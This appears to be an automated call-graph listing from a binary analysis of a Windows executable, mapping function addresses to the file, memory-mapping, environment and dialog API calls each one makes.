7ff6ca9c1fa0 31 API calls 27091->27093 27092->27091 27782 7ff6ca9c2d80 27092->27782 27096 7ff6ca9c2ca1 27093->27096 27109 7ff6ca9c2d64 27096->27109 27812 7ff6ca9c3090 27096->27812 27097 7ff6ca9c2d08 27099 7ff6ca9c3090 31 API calls 27097->27099 27098 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27100 7ff6ca9c2d7c 27098->27100 27101 7ff6ca9c2d14 27099->27101 27102 7ff6ca9c1fa0 31 API calls 27101->27102 27103 7ff6ca9c2d20 27102->27103 27820 7ff6ca9d878c 27103->27820 27109->27098 27110->26765 27111->26767 27112->26769 27130 7ff6ca9d56a4 27113->27130 27115 7ff6ca9c91df 27133 7ff6ca9db788 27115->27133 27119 7ff6ca9c9383 27119->26831 27121 7ff6ca9d4d32 __scrt_get_show_window_mode 27120->27121 27148 7ff6ca9d4bac 27121->27148 27123 7ff6ca9d4d54 27124 7ff6ca9d4d90 27123->27124 27126 7ff6ca9d4dae 27123->27126 27125 7ff6ca9f2320 _handle_error 8 API calls 27124->27125 27127 7ff6ca9c2b32 27125->27127 27128 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27126->27128 27127->26752 27127->26834 27129 7ff6ca9d4db3 27128->27129 27139 7ff6ca9d56e8 27130->27139 27134 7ff6ca9c13a4 33 API calls 27133->27134 27135 7ff6ca9c9365 27134->27135 27136 7ff6ca9c9a28 27135->27136 27137 7ff6ca9d56e8 2 API calls 27136->27137 27138 7ff6ca9c9a36 27137->27138 27138->27119 27140 7ff6ca9d56fe __scrt_get_show_window_mode 27139->27140 27143 7ff6ca9deba4 27140->27143 27146 7ff6ca9deb58 GetCurrentProcess GetProcessAffinityMask 27143->27146 27147 7ff6ca9d56de 27146->27147 27147->27115 27149 7ff6ca9d4c27 27148->27149 27151 7ff6ca9d4c2f BuildCatchObjectHelperInternal 27148->27151 27150 7ff6ca9c1fa0 31 API calls 27149->27150 27150->27151 27151->27123 27153 7ff6ca9d24fd CreateFileW 27152->27153 27155 7ff6ca9d25ae GetLastError 27153->27155 27164 7ff6ca9d266e 27153->27164 27156 7ff6ca9d6a0c 49 API calls 27155->27156 27157 7ff6ca9d25dc 27156->27157 27158 7ff6ca9d25e0 CreateFileW GetLastError 27157->27158 27163 7ff6ca9d262c 27157->27163 27158->27163 27159 7ff6ca9d26b1 SetFileTime 27162 7ff6ca9d26cf 27159->27162 27160 7ff6ca9d2708 27161 7ff6ca9f2320 _handle_error 8 API calls 27160->27161 27165 7ff6ca9d271b 27161->27165 27162->27160 27166 7ff6ca9c20b0 33 API calls 27162->27166 27163->27164 27167 7ff6ca9d2736 27163->27167 27164->27159 27164->27162 27165->26836 27170 7ff6ca9cb7e8 99 API calls 2 library calls 27165->27170 27166->27160 27168 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27167->27168 27169 7ff6ca9d273b 27168->27169 27170->26836 27173 7ff6ca9d28f6 27171->27173 27174 7ff6ca9d28fd 27171->27174 27172 7ff6ca9d2320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 27172->27174 27173->26841 27174->27172 27174->27173 27192 7ff6ca9cb8a4 99 API calls Concurrency::cancel_current_task 27174->27192 27177 7ff6ca9d2bcd 27176->27177 27179 7ff6ca9d2be9 27176->27179 27178 7ff6ca9c34cc 27177->27178 27193 7ff6ca9cb9c4 99 API calls Concurrency::cancel_current_task 27177->27193 27178->26865 27179->27178 27181 7ff6ca9d2c01 SetFilePointer 27179->27181 27181->27178 27182 7ff6ca9d2c1e GetLastError 27181->27182 27182->27178 27183 7ff6ca9d2c28 27182->27183 27183->27178 27194 7ff6ca9cb9c4 99 API calls Concurrency::cancel_current_task 27183->27194 27195 7ff6ca9d2778 27185->27195 27188 7ff6ca9c35a7 27188->26849 27188->26867 27190->26852 27191->26851 27196 7ff6ca9d2789 _snwprintf 27195->27196 27198 7ff6ca9d2890 SetFilePointer 27196->27198 27201 7ff6ca9d27b5 27196->27201 27197 7ff6ca9f2320 _handle_error 8 API calls 27199 7ff6ca9d281d 27197->27199 27200 7ff6ca9d28b8 GetLastError 27198->27200 27198->27201 27199->27188 27202 7ff6ca9cb9c4 99 API calls Concurrency::cancel_current_task 27199->27202 27200->27201 27201->27197 27204 7ff6ca9c3396 27203->27204 27205 7ff6ca9c339a 27203->27205 27204->26877 27204->26878 27209 7ff6ca9c3294 27205->27209 27208 7ff6ca9d2aa0 101 API calls 27208->27204 27210 7ff6ca9c32bb 27209->27210 27212 7ff6ca9c32f6 27209->27212 27211 7ff6ca9c69f8 141 API calls 27210->27211 27215 7ff6ca9c32db 27211->27215 27217 7ff6ca9c6e74 27212->27217 27215->27208 27219 7ff6ca9c6e95 27217->27219 27218 7ff6ca9c69f8 141 API calls 27218->27219 27219->27218 27221 7ff6ca9c331d 27219->27221 27249 7ff6ca9de808 27219->27249 27221->27215 27222 7ff6ca9c3904 27221->27222 27257 7ff6ca9c6a7c 27222->27257 27225 7ff6ca9c396a 27228 7ff6ca9c3989 27225->27228 27229 7ff6ca9c399a 27225->27229 27227 7ff6ca9c3a8a 27230 7ff6ca9f2320 _handle_error 8 API calls 27227->27230 27290 7ff6ca9e0d54 33 API calls 27228->27290 27231 7ff6ca9c39a3 27229->27231 27232 7ff6ca9c39ec 27229->27232 27235 7ff6ca9c3a9e 27230->27235 27291 7ff6ca9e0c80 33 API calls 27231->27291 27292 7ff6ca9c26b4 33 API calls BuildCatchObjectHelperInternal 27232->27292 27233 7ff6ca9c3ab3 27236 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27233->27236 27235->27215 27238 7ff6ca9c3ab8 27236->27238 27242 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27238->27242 27239 7ff6ca9c39b0 27243 7ff6ca9c1fa0 31 API calls 27239->27243 27247 7ff6ca9c39c0 BuildCatchObjectHelperInternal 27239->27247 27241 7ff6ca9c3a13 27293 7ff6ca9e0ae8 34 API calls _invalid_parameter_noinfo_noreturn 27241->27293 27246 7ff6ca9c3abe 27242->27246 27243->27247 27244 7ff6ca9c1fa0 31 API calls 27248 7ff6ca9c394f 27244->27248 27247->27244 27248->27227 27248->27233 27248->27238 27250 7ff6ca9de811 27249->27250 27251 7ff6ca9de82b 27250->27251 27255 7ff6ca9cb664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27250->27255 27253 7ff6ca9de845 SetThreadExecutionState 27251->27253 27256 7ff6ca9cb664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27251->27256 27255->27251 27256->27253 27258 7ff6ca9c6a96 _snwprintf 27257->27258 27259 7ff6ca9c6ae4 27258->27259 27260 7ff6ca9c6ac4 27258->27260 27262 7ff6ca9c6d4d 27259->27262 27265 7ff6ca9c6b0f 27259->27265 27332 7ff6ca9c28a4 82 API calls 2 library calls 27260->27332 27361 7ff6ca9c28a4 82 API calls 2 library calls 27262->27361 27264 7ff6ca9c6ad0 27266 7ff6ca9f2320 _handle_error 8 API calls 27264->27266 27265->27264 27294 7ff6ca9e1f94 27265->27294 27267 7ff6ca9c394b 27266->27267 27267->27225 27267->27248 27289 7ff6ca9c2794 33 API calls __std_swap_ranges_trivially_swappable 27267->27289 27270 7ff6ca9c6b85 27273 7ff6ca9c6c2a 27270->27273 27288 7ff6ca9c6b7b 27270->27288 27338 7ff6ca9d8968 109 API calls 27270->27338 27271 7ff6ca9c6b80 27271->27270 27334 7ff6ca9c40b0 27271->27334 27272 7ff6ca9c6b6e 27333 7ff6ca9c28a4 82 API calls 2 library calls 27272->27333 27303 7ff6ca9d4760 27273->27303 27279 7ff6ca9c6c52 27280 7ff6ca9c6cd1 27279->27280 27281 7ff6ca9c6cc7 27279->27281 27339 7ff6ca9e1f20 27280->27339 27307 7ff6ca9d1794 27281->27307 27284 7ff6ca9c6ccf 27359 7ff6ca9d4700 8 API calls _handle_error 27284->27359 27286 7ff6ca9c6cfd 27286->27288 27322 7ff6ca9e1870 27288->27322 27289->27225 27290->27248 27291->27239 27292->27241 27293->27248 27295 7ff6ca9e2056 std::bad_alloc::bad_alloc 27294->27295 27298 7ff6ca9e1fc5 std::bad_alloc::bad_alloc 27294->27298 27362 7ff6ca9f4078 27295->27362 27296 7ff6ca9c6b59 27296->27270 27296->27271 27296->27272 27298->27296 27299 7ff6ca9f4078 Concurrency::cancel_current_task 2 API calls 27298->27299 27300 7ff6ca9e200f std::bad_alloc::bad_alloc 27298->27300 27299->27300 27300->27296 27301 7ff6ca9f4078 Concurrency::cancel_current_task 2 API calls 27300->27301 27302 7ff6ca9e20a9 27301->27302 27304 7ff6ca9d4780 27303->27304 27306 7ff6ca9d478a 27303->27306 27305 7ff6ca9f21d0 33 API calls 27304->27305 27305->27306 27306->27279 27308 7ff6ca9d17be __scrt_get_show_window_mode 27307->27308 27367 7ff6ca9d8a48 27308->27367 27311 7ff6ca9d17f2 27323 7ff6ca9e188e 27322->27323 27325 7ff6ca9e18a1 27323->27325 27387 7ff6ca9de948 27323->27387 27329 7ff6ca9e18d8 27325->27329 27383 7ff6ca9f236c 27325->27383 27327 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27328 7ff6ca9e1ad0 27327->27328 27331 7ff6ca9e1a37 27329->27331 27394 7ff6ca9da984 31 API calls _invalid_parameter_noinfo_noreturn 27329->27394 27331->27327 27332->27264 27333->27288 27335 7ff6ca9c40dd 27334->27335 27337 7ff6ca9c40d7 __scrt_get_show_window_mode 27334->27337 27335->27337 27395 7ff6ca9c4120 33 API calls 2 library calls 27335->27395 27337->27270 27338->27273 27340 7ff6ca9e1f29 27339->27340 27341 7ff6ca9e1f55 27340->27341 27342 7ff6ca9e1f5d 27340->27342 27343 7ff6ca9e1f49 27340->27343 27417 7ff6ca9e3964 156 API calls 27341->27417 27342->27284 27396 7ff6ca9e20ac 27343->27396 27352 7ff6ca9e4733 BuildCatchObjectHelperInternal 27359->27286 27361->27264 27363 7ff6ca9f40b4 RtlPcToFileHeader 27362->27363 27364 7ff6ca9f4097 27362->27364 27365 7ff6ca9f40cc 27363->27365 27366 7ff6ca9f40db RaiseException 27363->27366 27364->27363 27365->27366 27366->27298 27370 7ff6ca9d8bcd 27367->27370 27372 7ff6ca9d8a91 BuildCatchObjectHelperInternal 27367->27372 27368 7ff6ca9d8c1a 27369 7ff6ca9de808 SetThreadExecutionState RtlPcToFileHeader RaiseException 27368->27369 27374 7ff6ca9d8c1f 27369->27374 27370->27368 27371 7ff6ca9ca174 8 API calls 27370->27371 27371->27368 27372->27370 27373 7ff6ca9e612c 146 API calls 27372->27373 27372->27374 27375 7ff6ca9d4888 108 API calls 27372->27375 27376 7ff6ca9d28d0 104 API calls 27372->27376 27373->27372 27374->27311 27375->27372 27376->27372 27384 7ff6ca9f239f 27383->27384 27385 7ff6ca9f23c8 27384->27385 27386 7ff6ca9e1870 108 API calls 27384->27386 27385->27329 27386->27384 27388 7ff6ca9decd8 103 API calls 27387->27388 27389 7ff6ca9de95f ReleaseSemaphore 27388->27389 27390 7ff6ca9de9a3 DeleteCriticalSection CloseHandle CloseHandle 27389->27390 27391 7ff6ca9de984 27389->27391 27392 7ff6ca9dea5c 101 API calls 27391->27392 27393 7ff6ca9de98e CloseHandle 27392->27393 27393->27390 27393->27391 27394->27331 27398 7ff6ca9e20c8 __scrt_get_show_window_mode 27396->27398 27397 7ff6ca9e21ba 27397->27352 27398->27397 27399 7ff6ca9cb75c 82 API calls 27398->27399 27399->27398 27417->27342 27427 7ff6ca9d8882 27426->27427 27428 7ff6ca9d8892 27426->27428 27433 7ff6ca9d23f0 27427->27433 27428->26883 27431 7ff6ca9f2320 _handle_error 8 API calls 27430->27431 27432 7ff6ca9cf7dc 27431->27432 27432->26773 27432->26886 27434 7ff6ca9d240f 27433->27434 27437 7ff6ca9d2aa0 101 API calls 27434->27437 27435 7ff6ca9d2428 27438 7ff6ca9d2bb0 101 API calls 27435->27438 27436 7ff6ca9d2438 27436->27428 27437->27435 27438->27436 27439->26897 27441 7ff6ca9c5e67 27440->27441 27443 7ff6ca9c5ea5 27441->27443 27450 7ff6ca9c5eb7 27441->27450 27471 7ff6ca9c6084 27441->27471 27535 7ff6ca9c28a4 82 API calls 2 library calls 27443->27535 27445 7ff6ca9c6134 27542 7ff6ca9c6fcc 82 API calls 27445->27542 27447 7ff6ca9c5f44 27537 7ff6ca9c6d88 82 API calls 27447->27537 27448 7ff6ca9c69af 27449 7ff6ca9f2320 _handle_error 8 API calls 27448->27449 27452 7ff6ca9c69c3 27449->27452 27450->27445 27450->27447 27536 7ff6ca9c6f38 33 API calls BuildCatchObjectHelperInternal 27450->27536 27452->26910 27454 7ff6ca9c69e4 27456 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27454->27456 27455 7ff6ca9c6973 27519 7ff6ca9c5eb2 27455->27519 27555 7ff6ca9c466c 82 API calls 27455->27555 27460 7ff6ca9c69e9 27456->27460 27459 7ff6ca9c612e 27459->27445 27459->27455 27463 7ff6ca9d85f0 104 API calls 27459->27463 27461 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27460->27461 27464 7ff6ca9c69ef 27461->27464 27462 7ff6ca9c6034 27465 7ff6ca9f236c 108 API calls 27462->27465 27462->27471 27466 7ff6ca9c61a4 27463->27466 27468 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27464->27468 27467 7ff6ca9c606e 27465->27467 27466->27445 27476 7ff6ca9c61ac 27466->27476 27469 7ff6ca9f236c 108 API calls 27467->27469 27470 7ff6ca9c69f5 27468->27470 27469->27471 27525 7ff6ca9d85f0 27471->27525 27472 7ff6ca9c6097 27541 7ff6ca9c433c 82 API calls 2 library calls 27472->27541 27475 7ff6ca9c5f5d 27475->27462 27475->27472 27538 7ff6ca9c433c 82 API calls 2 library calls 27475->27538 27539 7ff6ca9c6d88 82 API calls 27475->27539 27540 7ff6ca9ca1a0 109 API calls _handle_error 27475->27540 27477 7ff6ca9c623f 27476->27477 27543 7ff6ca9c466c 82 API calls 27476->27543 27477->27455 27483 7ff6ca9c6266 27477->27483 27479 7ff6ca9c60a1 27481 7ff6ca9f236c 108 API calls 27479->27481 27479->27519 27482 7ff6ca9c60f4 27481->27482 27519->27448 27519->27454 27519->27464 27523->26910 27526 7ff6ca9d869a 27525->27526 27528 7ff6ca9d8614 27525->27528 27527 7ff6ca9d867c 27526->27527 27530 7ff6ca9c40b0 33 API calls 27526->27530 27527->27459 27528->27527 27529 7ff6ca9c40b0 33 API calls 27528->27529 27531 7ff6ca9d864d 27529->27531 27532 7ff6ca9d86b3 27530->27532 27556 7ff6ca9ca174 27531->27556 27534 7ff6ca9d28d0 104 API calls 27532->27534 27534->27527 27535->27519 27537->27475 27538->27475 27539->27475 27540->27475 27541->27479 27542->27519 27557 7ff6ca9ca185 27556->27557 27558 7ff6ca9ca19a 27557->27558 27560 7ff6ca9daf18 8 API calls 2 library calls 27557->27560 27558->27527 27560->27558 27562 7ff6ca9c9be7 27561->27562 27563 7ff6ca9c9c1b 27562->27563 27567 7ff6ca9c9c83 27562->27567 27570 7ff6ca9c9cae 27562->27570 27694 7ff6ca9d5294 27562->27694 27712 7ff6ca9ddb60 27562->27712 27564 7ff6ca9f2320 _handle_error 8 API calls 27563->27564 27565 7ff6ca9c9c9d 27564->27565 27565->26927 27568 7ff6ca9c1fa0 31 API calls 27567->27568 27568->27563 27571 7ff6ca9c9cbf 27570->27571 27716 7ff6ca9dda48 CompareStringW 27570->27716 27571->27567 27573 7ff6ca9c20b0 33 API calls 27571->27573 27573->27567 27587 7ff6ca9d5f3a 27574->27587 27575 7ff6ca9d619b 27576 7ff6ca9f2320 _handle_error 8 API calls 27575->27576 27579 7ff6ca9cfb29 27576->27579 27577 7ff6ca9d61ce 27720 7ff6ca9c704c 47 API calls BuildCatchObjectHelperInternal 27577->27720 27579->26931 27641 7ff6ca9d7c94 47 API calls 2 library calls 27579->27641 27580 7ff6ca9d61d4 27581 7ff6ca9c129c 33 API calls 27582 7ff6ca9d6129 27581->27582 27583 7ff6ca9c1fa0 31 API calls 27582->27583 27584 7ff6ca9d613b BuildCatchObjectHelperInternal 27582->27584 27583->27584 27584->27575 27585 7ff6ca9d61c9 27584->27585 27586 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27585->27586 27586->27577 27587->27575 27587->27577 27587->27581 27640->26919 27692->26926 27693->26926 27695 7ff6ca9d52d4 27694->27695 27699 7ff6ca9d5312 __vcrt_FlsAlloc 27695->27699 27706 7ff6ca9d5339 __vcrt_FlsAlloc 27695->27706 27717 7ff6ca9e13f4 CompareStringW 27695->27717 27696 7ff6ca9f2320 _handle_error 8 API calls 27698 7ff6ca9d5503 27696->27698 27698->27562 27701 7ff6ca9d5382 __vcrt_FlsAlloc 27699->27701 27699->27706 27718 7ff6ca9e13f4 CompareStringW 27699->27718 27702 7ff6ca9c129c 33 API calls 27701->27702 27703 7ff6ca9d5439 27701->27703 27701->27706 27704 7ff6ca9d5426 27702->27704 27705 7ff6ca9d5489 27703->27705 27708 7ff6ca9d551b 27703->27708 27707 7ff6ca9d72cc 8 API calls 27704->27707 27705->27706 27719 7ff6ca9e13f4 CompareStringW 27705->27719 27706->27696 27707->27703 27710 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27708->27710 27711 7ff6ca9d5520 27710->27711 27714 7ff6ca9ddb73 27712->27714 27713 7ff6ca9ddb91 27713->27562 27714->27713 27715 7ff6ca9c20b0 33 API calls 27714->27715 27715->27713 27716->27571 27717->27699 27718->27701 27719->27706 27720->27580 27784 7ff6ca9c2da5 27782->27784 27811 7ff6ca9c3025 27784->27811 27834 7ff6ca9db7e4 31 API calls _invalid_parameter_noinfo_noreturn 27784->27834 27785 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27786 7ff6ca9c3045 27785->27786 27787 7ff6ca9f236c 108 API calls 27786->27787 27789 7ff6ca9c306f 27787->27789 27788 7ff6ca9c2dfa 27792 7ff6ca9c1fa0 31 API calls 27788->27792 27788->27811 27790 7ff6ca9f236c 108 API calls 27789->27790 27791 7ff6ca9c3087 27790->27791 27791->27091 27793 7ff6ca9c2fb9 27792->27793 27794 7ff6ca9c1fa0 31 API calls 27793->27794 27795 7ff6ca9c2fc5 27794->27795 27796 7ff6ca9c1fa0 31 API calls 27795->27796 27797 7ff6ca9c2fd1 27796->27797 27798 7ff6ca9c1fa0 31 API calls 27797->27798 27799 7ff6ca9c2fdd 27798->27799 27800 7ff6ca9c1fa0 31 API calls 27799->27800 27801 7ff6ca9c2fe9 27800->27801 27802 7ff6ca9c1fa0 31 API calls 27801->27802 27803 7ff6ca9c2ff5 27802->27803 27804 7ff6ca9c1fa0 31 API calls 27803->27804 27805 7ff6ca9c3001 27804->27805 27806 7ff6ca9c1fa0 31 API calls 27805->27806 27807 7ff6ca9c300d 27806->27807 27808 7ff6ca9c1fa0 31 API calls 27807->27808 27809 7ff6ca9c3019 27808->27809 27810 7ff6ca9c1fa0 31 API calls 27809->27810 27810->27811 27811->27785 27813 7ff6ca9c1fa0 31 API calls 27812->27813 27814 7ff6ca9c30a5 27813->27814 27815 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27814->27815 27816 7ff6ca9c30fd 27815->27816 27817 7ff6ca9db825 27816->27817 27818 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27816->27818 27817->27097 27819 7ff6ca9db846 27818->27819 27821 7ff6ca9d87af 27820->27821 27833 7ff6ca9d87df 27820->27833 27822 7ff6ca9f236c 108 API calls 27821->27822 27824 7ff6ca9d87ca 27822->27824 27827 7ff6ca9f236c 108 API calls 27824->27827 27825 7ff6ca9f236c 108 API calls 27828 7ff6ca9d8814 27825->27828 27826 7ff6ca9d8845 27829 7ff6ca9d461c 108 API calls 27826->27829 27827->27833 27830 7ff6ca9f236c 108 API calls 27828->27830 27832 7ff6ca9d8851 27829->27832 27831 7ff6ca9d882b 27830->27831 27835 7ff6ca9d461c 27831->27835 27833->27825 27833->27831 27834->27788 27836 7ff6ca9d4632 27835->27836 27838 7ff6ca9d463a 27835->27838 27837 7ff6ca9de948 108 API calls 27836->27837 27837->27838 27838->27826 27840 7ff6ca9d163e 27839->27840 27844 7ff6ca9d1681 27839->27844 27843 7ff6ca9d31bc 51 API calls 27840->27843 27840->27844 27841 7ff6ca9c1fa0 31 API calls 27841->27844 27842 7ff6ca9ce600 31 API calls 27847 7ff6ca9d16de 27842->27847 27843->27840 27844->27841 27849 7ff6ca9d16a0 27844->27849 27845 7ff6ca9d178d 27851 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27845->27851 27846 7ff6ca9d175b 27848 7ff6ca9f2320 _handle_error 8 API calls 27846->27848 27847->27845 27847->27846 27850 7ff6ca9ce58a 27848->27850 27849->27842 27850->26709 27850->26710 27852 7ff6ca9d1792 27851->27852 27854 7ff6ca9e84cc 4 API calls 27853->27854 27855 7ff6ca9e84aa 27854->27855 27856 7ff6ca9e84b9 27855->27856 27866 7ff6ca9e8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27855->27866 27856->26221 27856->26222 27858->26227 27859->26234 27861 7ff6ca9e84de 27860->27861 27863 7ff6ca9e84e3 27860->27863 27867 7ff6ca9e8590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27861->27867 27863->26234 27864->26236 27866->27856 27867->27863 27868->26272 27869->26289 27870->26299 27872 7ff6ca9f20f0 27873 7ff6ca9f2106 _com_error::_com_error 27872->27873 27874 7ff6ca9f4078 Concurrency::cancel_current_task 2 API calls 27873->27874 27875 7ff6ca9f2117 27874->27875 27876 7ff6ca9f1900 _com_raise_error 14 API calls 27875->27876 27877 7ff6ca9f2163 27876->27877 27878 7ff6ca9f1491 27879 7ff6ca9f13c9 27878->27879 27880 7ff6ca9f1900 _com_raise_error 14 API calls 27879->27880 27881 7ff6ca9f1408 27880->27881 27882 7ff6ca9f11cf 27883 7ff6ca9f1102 27882->27883 27884 7ff6ca9f1900 _com_raise_error 14 API calls 27883->27884 27884->27883 27885 7ff6ca9f2d6c 27910 7ff6ca9f27fc 27885->27910 27888 7ff6ca9f2eb8 28004 7ff6ca9f3170 7 API calls 2 library calls 27888->28004 27889 7ff6ca9f2d88 __scrt_acquire_startup_lock 27891 7ff6ca9f2ec2 27889->27891 27894 7ff6ca9f2da6 27889->27894 28005 7ff6ca9f3170 7 API calls 2 library calls 27891->28005 27893 7ff6ca9f2de8 __scrt_release_startup_lock 27898 7ff6ca9f2e51 27893->27898 28001 7ff6ca9fc050 35 API calls __GSHandlerCheck_EH 27893->28001 27894->27893 27895 7ff6ca9f2dcb 27894->27895 27918 7ff6ca9fcd90 27894->27918 27896 7ff6ca9f2ecd abort 27922 7ff6ca9f32bc 27898->27922 27900 7ff6ca9f2e56 27925 7ff6ca9fcd20 27900->27925 27907 7ff6ca9f2e79 27907->27896 28003 7ff6ca9f2990 7 API calls __scrt_initialize_crt 27907->28003 27909 7ff6ca9f2e90 27909->27895 28006 7ff6ca9f2fb0 27910->28006 27913 7ff6ca9f282b 28008 7ff6ca9fcc50 27913->28008 27917 7ff6ca9f2827 27917->27888 27917->27889 27919 7ff6ca9fcdcc 27918->27919 27920 7ff6ca9fcdeb 27918->27920 27919->27920 28025 7ff6ca9c1120 27919->28025 27920->27893 27923 7ff6ca9f3cf0 __scrt_get_show_window_mode 27922->27923 27924 7ff6ca9f32d3 GetStartupInfoW 27923->27924 27924->27900 28031 7ff6caa00730 27925->28031 27927 7ff6ca9fcd2f 27928 7ff6ca9f2e5e 27927->27928 28035 7ff6caa00ac0 35 API calls swprintf 27927->28035 27930 7ff6ca9f0754 27928->27930 28037 7ff6ca9ddfd0 27930->28037 27933 7ff6ca9d62dc 35 API calls 27934 7ff6ca9f079a 27933->27934 28114 7ff6ca9e946c 27934->28114 27936 7ff6ca9f07a4 __scrt_get_show_window_mode 28119 7ff6ca9e9a14 27936->28119 27938 7ff6ca9f0ddc 27940 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27938->27940 27939 7ff6ca9f096e GetCommandLineW 27942 7ff6ca9f0980 27939->27942 27943 7ff6ca9f0b42 27939->27943 27944 7ff6ca9f0de2 27940->27944 27941 7ff6ca9f0819 27941->27938 27941->27939 27948 7ff6ca9c129c 33 API calls 27942->27948 27945 7ff6ca9d6454 34 API calls 27943->27945 27947 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27944->27947 27946 7ff6ca9f0b51 27945->27946 27950 7ff6ca9c1fa0 31 API calls 27946->27950 27954 7ff6ca9f0b68 BuildCatchObjectHelperInternal 27946->27954 27949 7ff6ca9f0de8 27947->27949 27952 7ff6ca9f09a5 27948->27952 27953 7ff6ca9f1900 _com_raise_error 14 API calls 27949->27953 27950->27954 27951 7ff6ca9c1fa0 31 API calls 27955 7ff6ca9f0b93 SetEnvironmentVariableW GetLocalTime 27951->27955 28153 7ff6ca9ecad0 102 API calls 3 library calls 27952->28153 27957 7ff6ca9f0e34 27953->27957 27954->27951 27958 7ff6ca9d3e28 swprintf 46 API calls 27955->27958 27960 7ff6ca9f0c18 SetEnvironmentVariableW GetModuleHandleW LoadIconW 27958->27960 27959 7ff6ca9f09af 27959->27944 27961 7ff6ca9f0adb 27959->27961 27962 7ff6ca9f09f9 OpenFileMappingW 27959->27962 28129 7ff6ca9eb014 LoadBitmapW 27960->28129 27969 7ff6ca9c129c 33 API calls 27961->27969 27964 7ff6ca9f0ad0 CloseHandle 27962->27964 27965 7ff6ca9f0a19 MapViewOfFile 27962->27965 27964->27943 27965->27964 27967 7ff6ca9f0a3f UnmapViewOfFile MapViewOfFile 27965->27967 27966 7ff6ca9f0c5f 28145 7ff6ca9d98ac 27966->28145 27967->27964 27970 7ff6ca9f0a71 27967->27970 27973 7ff6ca9f0b00 27969->27973 28154 7ff6ca9ea190 33 API calls 2 library calls 27970->28154 27971 7ff6ca9f0c75 28150 7ff6ca9e67b4 27971->28150 28158 7ff6ca9efd0c 35 API calls 2 library calls 27973->28158 27977 7ff6ca9f0a81 28155 7ff6ca9efd0c 35 API calls 2 library calls 27977->28155 27978 7ff6ca9e67b4 33 API calls 27981 7ff6ca9f0c87 DialogBoxParamW 27978->27981 27979 7ff6ca9f0b0a 27979->27943 27984 7ff6ca9f0dd7 27979->27984 27989 7ff6ca9f0cd3 27981->27989 27982 7ff6ca9f0a90 28156 7ff6ca9db9b4 102 API calls 27982->28156 27986 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27984->27986 27985 7ff6ca9f0aa5 28157 7ff6ca9dbb00 102 API calls 27985->28157 27986->27938 27988 7ff6ca9f0ab8 27992 7ff6ca9f0ac7 UnmapViewOfFile 27988->27992 27990 7ff6ca9f0cec 27989->27990 27991 7ff6ca9f0ce6 Sleep 27989->27991 27994 7ff6ca9f0cfa 27990->27994 28159 7ff6ca9e9f4c 49 API calls 2 library calls 27990->28159 27991->27990 27992->27964 27995 7ff6ca9f0d5b 27994->27995 27998 7ff6ca9f0d6d 27994->27998 27996 7ff6ca9efe24 5 API calls 27995->27996 27997 7ff6ca9f0d60 CloseHandle 27996->27997 27997->27998 27999 7ff6ca9f2320 _handle_error 8 API calls 27998->27999 28000 7ff6ca9f0dba 27999->28000 28002 7ff6ca9f3300 GetModuleHandleW 28000->28002 28001->27898 28002->27907 28003->27909 28004->27891 28005->27896 28007 7ff6ca9f281e __scrt_dllmain_crt_thread_attach 28006->28007 28007->27913 28007->27917 28009 7ff6caa00d4c 28008->28009 28010 7ff6ca9f2830 28009->28010 28013 7ff6ca9fec00 28009->28013 28010->27917 28012 7ff6ca9f51a0 7 API calls 2 library calls 28010->28012 28012->27917 28024 7ff6ca9ff398 EnterCriticalSection 28013->28024 28026 7ff6ca9c91c8 35 API calls 28025->28026 28027 7ff6ca9c1130 28026->28027 28030 7ff6ca9f29bc 34 API calls 28027->28030 28029 7ff6ca9f2a01 28029->27919 28030->28029 28032 7ff6caa00749 28031->28032 28033 7ff6caa0073d 28031->28033 28032->27927 28036 7ff6caa00570 48 API calls 5 library calls 28033->28036 28035->27927 28036->28032 28160 7ff6ca9f2450 28037->28160 28039 7ff6ca9ddff4 GetModuleHandleW 28040 7ff6ca9de07b 28039->28040 28041 7ff6ca9de026 GetProcAddress 28039->28041 28044 7ff6ca9de503 28040->28044 28167 7ff6ca9fb788 39 API calls _snwprintf 28040->28167 28042 7ff6ca9de053 GetProcAddress 28041->28042 28043 7ff6ca9de03b 28041->28043 28042->28040 28046 7ff6ca9de068 28042->28046 28043->28042 28045 7ff6ca9d6454 34 API calls 28044->28045 28048 7ff6ca9de50c 28045->28048 28046->28040 28050 7ff6ca9d7df4 47 API calls 28048->28050 28049 7ff6ca9de3b0 28049->28044 28051 7ff6ca9de3ba 28049->28051 28080 7ff6ca9de51a 28050->28080 28052 7ff6ca9d6454 34 API calls 28051->28052 28053 7ff6ca9de3c3 CreateFileW 28052->28053 28054 7ff6ca9de403 SetFilePointer 28053->28054 28055 7ff6ca9de4f0 CloseHandle 28053->28055 28054->28055 28057 7ff6ca9de41c ReadFile 28054->28057 28058 7ff6ca9c1fa0 31 API calls 28055->28058 28057->28055 28059 7ff6ca9de444 28057->28059 28058->28044 28060 7ff6ca9de800 28059->28060 28061 7ff6ca9de458 28059->28061 28173 7ff6ca9f2624 8 API calls 28060->28173 28066 7ff6ca9c129c 33 API calls 28061->28066 28063 7ff6ca9c129c 33 API calls 28063->28080 28064 7ff6ca9de805 28065 7ff6ca9de53e CompareStringW 28065->28080 28072 7ff6ca9de48f 28066->28072 